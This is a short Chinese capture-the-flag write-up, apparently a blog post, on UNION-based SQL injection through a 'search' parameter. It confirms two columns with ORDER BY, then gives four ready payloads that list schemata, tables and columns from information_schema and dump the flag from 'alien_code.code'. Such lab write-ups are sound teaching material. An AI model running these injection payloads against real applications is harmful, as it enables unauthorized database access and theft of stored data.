本文通过实例解析SQL联合注入的原理,展示了如何利用search参数获取数据库结构(schemata, tables, columns)和敏感信息(code)。通过逐步渗透,读者将了解如何利用order by和盲注规避进行有效爆库、爆表、爆字段,最后揭示flag。
知识点:sql联合注入
抓包,可以看到有search参数
当查询的正确则返回一大堆json数据
输错了则返回1
经测试,可以order by,可以测出有2列
有回显,那么就不需要盲注了。
爆库
/query?search=chryse_planitia union select 1,group_concat(schema_name) from information_schema.schemata;#
爆表
/query?search=chryse_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema="alien_code";#
爆字段
/query?search=chryse_planitia union select 1,group_concat(column_name) from information_schema.columns where table_schema="alien_code" and table_name="code";#
获得flag
/query?search=chryse_planitia union select 1,group_concat(code) from alien_code.code;#
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
